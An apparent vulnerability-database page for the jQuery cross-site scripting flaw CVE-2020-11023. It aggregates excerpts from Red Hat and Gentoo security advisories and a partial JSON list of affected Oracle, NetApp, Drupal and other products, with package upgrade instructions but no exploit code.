Search criteria
ⓘ
Use full-text search for keyword queries.
Combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by dates instead of relevance.
96 vulnerabilities found for h500s by netapp
VAR-202004-2199
Vulnerability from variot - Updated: 2026-04-10 23:34In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. A cross-site scripting vulnerability exists in jQuery versions 1.0.3 through 3.5.0. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64
- Description:
The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System. Bugs fixed (https://bugzilla.redhat.com/):
1376706 - restore SerialNumber tag in caManualRenewal xml 1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1406505 - KRA ECC installation failed with shared tomcat 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1666907 - CC: Enable AIA OCSP cert checking for entire cert chain 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page 1710171 - CVE-2019-10146 pki-core: Reflected XSS in 'path length' constraint field in CA's Agent page 1721684 - Rebase pki-servlet-engine to 9.0.30 1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. 1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA 1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. 1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page 1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp 1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server 1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI 1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak 1824939 - JSS: add RSA PSS support - RHEL 8.3 1824948 - add RSA PSS support - RHEL 8.3 1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM agent page in authorize recovery tab [rhel-8] 1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in 'path length' constraint field in CA's Agent page [rhel-8] 1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password 1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired="true" but no secret 1850004 - CVE-2020-11023 jquery: Passing HTML containing elements to manipulation methods could result in untrusted code execution 1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException 1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing 1855273 - CVE-2020-15720 pki: Dogtag's python client does not validate certificates 1855319 - Not able to launch pkiconsole 1856368 - kra-key-generate request is failing 1857933 - CA Installation is failing with ncipher v12.30 HSM 1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request 1869893 - Common certificates are missing in CS.cfg on shared PKI instance 1871064 - replica install failing during pki-ca component configuration 1873235 - pki ca-user-cert-add with secure port failed with 'SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT'
- Description:
Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001 JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001 JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001 JBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9 JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001 JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001 JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001 JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001 JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001 JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001 JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001 JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002 JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001 JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001 JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003 JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2 JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001 JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update Advisory ID: RHSA-2022:6393-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2022:6393 Issue date: 2022-09-08 CVE Names: CVE-2020-11022 CVE-2020-11023 CVE-2021-22096 CVE-2021-23358 CVE-2022-2806 CVE-2022-31129 ==================================================================== 1. Summary:
Updated ovirt-engine packages that fix several bugs and add various enhancements are now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch
- Description:
The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning.
Security Fix(es):
-
nodejs-underscore: Arbitrary code execution via the template function (CVE-2021-23358)
-
moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
-
jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022)
-
jquery: Untrusted code execution via tag in HTML passed to DOM manipulation methods (CVE-2020-11023)
-
ovirt-log-collector: RHVM admin password is logged unfiltered (CVE-2022-2806)
-
springframework: malicious input leads to insertion of additional log entries (CVE-2021-22096)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
Previously, running engine-setup did not always renew OVN certificates close to expiration or expired. With this release, OVN certificates are always renewed by engine-setup when needed. (BZ#2097558)
-
Previously, the Manager issued warnings of approaching certificate expiration before engine-setup could update certificates. In this release expiration warnings and certificate update periods are aligned, and certificates are updated as soon as expiration warnings occur. (BZ#2097725)
-
With this release, OVA export or import work on hosts with a non-standard SSH port. (BZ#2104939)
-
With this release, the certificate validity test is compatible with RHEL 8 and RHEL 7 based hypervisors. (BZ#2107250)
-
RHV 4.4 SP1 and later are only supported on RHEL 8.6, customers cannot use RHEL 8.7 or later, and must stay with RHEL 8.6 EUS. (BZ#2108985)
-
Previously, importing templates from the Administration Portal did not work. With this release, importing templates from the Administration Portal is possible. (BZ#2109923)
-
ovirt-provider-ovn certificate expiration is checked along with other RHV certificates. If ovirt-provider-ovn is about to expire or already expired, a warning or alert is raised in the audit log. To renew the ovirt-provider-ovn certificate, administators must run engine-setup. If your ovirt-provider-ovn certificate expires on a previous RHV version, upgrade to RHV 4.4 SP1 batch 2 or later, and ovirt-provider-ovn certificate will be renewed automatically in the engine-setup. (BZ#2097560)
-
Previously, when importing a virtual machine with manual CPU pinning, the manual pinning string was cleared, but the CPU pinning policy was not set to NONE. As a result, importing failed. In this release, the CPU pinning policy is set to NONE if the CPU pinning string is cleared, and importing succeeds. (BZ#2104115)
-
Previously, the Manager could start a virtual machine with a Resize and Pin NUMA policy on a host without an equal number of physical sockets to NUMA nodes. As a result, wrong pinning was assigned to the policy. With this release, the Manager does not allow the virtual machine to be scheduled on such a virtual machine, and the pinning is correct based on the algorithm. (BZ#1955388)
-
Rebase package(s) to version: 4.4.7. Highlights, important fixes, or notable enhancements: fixed BZ#2081676 (BZ#2104831)
-
In this release, rhv-log-collector-analyzer provides detailed output for each problematic image, including disk names, associated virtual machine, the host running the virtual machine, snapshots, and current SPM. The detailed view is now the default. The compact option can be set by using the --compact switch in the command line. (BZ#2097536)
-
UnboundID LDAP SDK has been rebased on upstream version 6.0.4. See https://github.com/pingidentity/ldapsdk/releases for changes since version 4.0.14 (BZ#2092478)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/2974891
-
1944286 - CVE-2021-23358 nodejs-underscore: Arbitrary code execution via the template function 1955388 - Auto Pinning Policy only pins some of the vCPUs on a single NUMA host 1974974 - Not possible to determine migration policy from the API, even though documentation reports that it can be done. 2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries 2080005 - CVE-2022-2806 ovirt-log-collector: RHVM admin password is logged unfiltered 2092478 - Upgrade unboundid-ldapsdk to 6.0.4 2094577 - rhv-image-discrepancies must ignore small disks created by OCP 2097536 - [RFE] Add disk name and uuid to problems output 2097558 - Renew ovirt-provider-ovn.cer certificates during engine-setup 2097560 - Warning when ovsdb-server certificates are about to expire(OVN certificate) 2097725 - Certificate Warn period and automatic renewal via engine-setup do not match 2104115 - RHV 4.5 cannot import VMs with cpu pinning 2104831 - Upgrade ovirt-log-collector to 4.4.7 2104939 - Export OVA when using host with port other than 22 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2107250 - Upgrade of the host failed as the RHV 4.3 hypervisor is based on RHEL 7 with openssl 1.0.z, but RHV Manager 4.4 uses the openssl 1.1.z syntax 2107267 - ovirt-log-collector doesn't generate database dump 2108985 - RHV 4.4 SP1 EUS requires RHEL 8.6 EUS (RHEL 8.7+ releases are not supported on RHV 4.4 SP1 EUS) 2109923 - Error when importing templates in Admin portal
-
Package List:
RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:
Source: ovirt-engine-4.5.2.4-0.1.el8ev.src.rpm ovirt-engine-dwh-4.5.4-1.el8ev.src.rpm ovirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.src.rpm ovirt-engine-ui-extensions-1.3.5-1.el8ev.src.rpm ovirt-log-collector-4.4.7-2.el8ev.src.rpm ovirt-web-ui-1.9.1-1.el8ev.src.rpm rhv-log-collector-analyzer-1.0.15-1.el8ev.src.rpm unboundid-ldapsdk-6.0.4-1.el8ev.src.rpm vdsm-jsonrpc-java-1.7.2-1.el8ev.src.rpm
noarch: ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-backend-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-dbscripts-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-dwh-4.5.4-1.el8ev.noarch.rpm ovirt-engine-dwh-grafana-integration-setup-4.5.4-1.el8ev.noarch.rpm ovirt-engine-dwh-setup-4.5.4-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-1.4.6-1.el8ev.noarch.rpm ovirt-engine-extension-aaa-ldap-setup-1.4.6-1.el8ev.noarch.rpm ovirt-engine-health-check-bundler-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-restapi-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-base-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-plugin-cinderlib-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-plugin-imageio-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-plugin-ovirt-engine-common-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-setup-plugin-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-tools-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-tools-backup-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-ui-extensions-1.3.5-1.el8ev.noarch.rpm ovirt-engine-vmconsole-proxy-helper-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-webadmin-portal-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-engine-websocket-proxy-4.5.2.4-0.1.el8ev.noarch.rpm ovirt-log-collector-4.4.7-2.el8ev.noarch.rpm ovirt-web-ui-1.9.1-1.el8ev.noarch.rpm python3-ovirt-engine-lib-4.5.2.4-0.1.el8ev.noarch.rpm rhv-log-collector-analyzer-1.0.15-1.el8ev.noarch.rpm rhvm-4.5.2.4-0.1.el8ev.noarch.rpm unboundid-ldapsdk-6.0.4-1.el8ev.noarch.rpm unboundid-ldapsdk-javadoc-6.0.4-1.el8ev.noarch.rpm vdsm-jsonrpc-java-1.7.2-1.el8ev.noarch.rpm vdsm-jsonrpc-java-javadoc-1.7.2-1.el8ev.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-11022 https://access.redhat.com/security/cve/CVE-2020-11023 https://access.redhat.com/security/cve/CVE-2021-22096 https://access.redhat.com/security/cve/CVE-2021-23358 https://access.redhat.com/security/cve/CVE-2022-2806 https://access.redhat.com/security/cve/CVE-2022-31129 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYxnqRtzjgjWX9erEAQiQOw//XOS172gkbNeuoMSW1IYiEpJG4zQIvT2J VvyizOMlQzpe49Bkopu1zj/e8yM1eXNIg1elPzA3280z7ruNb4fkeoXT7vM5mB/0 jRAr1ja9ZHnZmEW60X3WVhEBjEXCeOv5CWBgqzdQWSB7RpPqfMP7/4kHGFnCPZxu V/n+Z9YKoDxeiW19tuTdU5E5cFySVV8JZAlfXlrR1dz815Ugsm2AMk6uPwjQ2+C7 Uz3zLQLjRjxFk+qSph8NYbOZGnUkypWQG5KXPMyk/Cg3jewjMkjAhzgcTJAdolRC q3p9kD5KdWRe+3xzjy6B4IsSSqvEyHphwrRv8wgk0vIAawfgi76+jL7n/C07rdpA Qg6zlDxmHDrZPC42dsW6dXJ1QefRQE5EzFFJcoycqvWdlRfXX6D1RZc5knSQb2iI 3iSh+hVwxY9pzNZVMlwtDHhw8dqvgw7JimToy8vOldgK0MdndwtVmKsKsRzu7HyL PQSvcN5lSv1X5FR2tnx9LMQXX1qn0P1d/8gTiRFm8Oabjx2r8I0/HNgnJpTSVSBO DXjKFDmwpiT+6tupM39ZbWek2hh+PoyMZJb/d6/YTND6VNlzUypq+DFtLILEaM8Z OjWz0YAL8/ihvhq0vSdFSMFcYKSWAOXA+6pSqe7N7WtB9hl0r7sLUaRSRHti1Ime uF/GLDTKkPw=8zTJ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202007-03
https://security.gentoo.org/ <https://security.gentoo.org/>
Severity: Normal Title: Cacti: Multiple vulnerabilities Date: July 26, 2020 Bugs: #728678, #732522 ID: 202007-03
Synopsis
Multiple vulnerabilities have been found in Cacti, the worst of which could result in the arbitrary execution of code.
Background
Cacti is a complete frontend to rrdtool.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-analyzer/cacti < 1.2.13 >= 1.2.13 2 net-analyzer/cacti-spine < 1.2.13 >= 1.2.13 ------------------------------------------------------------------- 2 affected packages
Description
Multiple vulnerabilities have been discovered in Cacti. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All Cacti users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/cacti-1.2.13"
All Cacti Spine users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=net-analyzer/cacti-spine-1.2.13"
References
[ 1 ] CVE-2020-11022 https://nvd.nist.gov/vuln/detail/CVE-2020-11022 https://nvd.nist.gov/vuln/detail/CVE-2020-11022 [ 2 ] CVE-2020-11023 https://nvd.nist.gov/vuln/detail/CVE-2020-11023 https://nvd.nist.gov/vuln/detail/CVE-2020-11023 [ 3 ] CVE-2020-14295 https://nvd.nist.gov/vuln/detail/CVE-2020-14295 https://nvd.nist.gov/vuln/detail/CVE-2020-14295
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202007-03 https://security.gentoo.org/glsa/202007-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org https://bugs.gentoo.org/.
License
Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 https://creativecommons.org/licenses/by-sa/2.5
. Relevant releases/architectures:
6ComputeNode-RH6-A-MQ-Interconnect-1 - noarch, x86_64 6Server-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64 6Workstation-RH6-A-MQ-Interconnect-1 - i386, noarch, x86_64 7ComputeNode-RH7-A-MQ-Interconnect-1 - noarch, x86_64 7Server-RH7-A-MQ-Interconnect-1 - noarch, x86_64 7Workstation-RH7-A-MQ-Interconnect-1 - noarch, x86_64 8Base-A-MQ-Interconnect-1 - noarch, x86_64
- AMQ Interconnect provides flexible routing of messages between AMQP-enabled endpoints, whether they are clients, servers, brokers, or any other entity that can send or receive standard AMQP messages. For further information, refer to the release notes linked to in the References section. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
ENTMQIC-2448 - Allow specifying address/source/target to be used for a multitenant listener ENTMQIC-2455 - Allow AMQP open properties to be supplemented from connector configuration ENTMQIC-2460 - Adding new config address, autolinks and link routes become slower as more get added ENTMQIC-2481 - Unable to delete listener with http enabled ENTMQIC-2485 - The VhostNamePatterns does not work in OCP env ENTMQIC-2492 - router drops TransactionalState on produced messages on link routes
- Description:
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.7"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "financial services revenue management and billing analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.8"
},
{
"_id": null,
"model": "hyperion financial reporting",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.2.4"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.5.0"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2.1"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.0"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.0.4"
},
{
"_id": null,
"model": "financial services revenue management and billing analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.3"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "drupal",
"scope": "gte",
"trust": 1.0,
"vendor": "drupal",
"version": "7.0"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "banking enterprise collections",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.8.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12.4"
},
{
"_id": null,
"model": "siebel mobile",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "20.12"
},
{
"_id": null,
"model": "storagetek acsls",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.5.1"
},
{
"_id": null,
"model": "blockchain platform",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "21.1.2"
},
{
"_id": null,
"model": "communications analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.1"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "8.7.14"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.1.3"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.4.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.5.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.10.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.0"
},
{
"_id": null,
"model": "communications eagle application processor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1.0"
},
{
"_id": null,
"model": "jquery",
"scope": "gte",
"trust": 1.0,
"vendor": "jquery",
"version": "1.0.3"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "peoplesoft enterprise human capital management resources",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "33"
},
{
"_id": null,
"model": "drupal",
"scope": "lt",
"trust": 1.0,
"vendor": "drupal",
"version": "7.70"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19c"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4.0"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.1"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2.11"
},
{
"_id": null,
"model": "jquery",
"scope": "lt",
"trust": 1.0,
"vendor": "jquery",
"version": "3.5.0"
},
{
"_id": null,
"model": "oss support tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "2.12.41"
},
{
"_id": null,
"model": "cloud insights storage workload security agent",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "log correlation engine",
"scope": "lt",
"trust": 1.0,
"vendor": "tenable",
"version": "6.0.9"
},
{
"_id": null,
"model": "financial services regulatory reporting for de nederlandsche bank",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18c"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "rest data services",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.2"
},
{
"_id": null,
"model": "business intelligence",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.9.0.0.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.3.1"
},
{
"_id": null,
"model": "communications operations monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4"
},
{
"_id": null,
"model": "health sciences inform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.3.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "healthcare translational research",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.3.2"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0"
},
{
"_id": null,
"model": "webcenter sites",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snap creator framework",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "storagetek tape analytics sw tool",
"scope": "eq",
"trust": 1.0,
